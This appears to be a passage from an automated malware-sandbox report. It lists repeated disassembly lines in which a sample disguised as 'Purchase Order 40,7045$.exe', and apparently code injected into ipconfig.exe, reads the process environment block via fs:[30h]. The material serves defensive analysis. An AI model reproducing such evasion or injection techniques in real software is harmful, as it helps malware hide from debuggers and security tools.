          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]
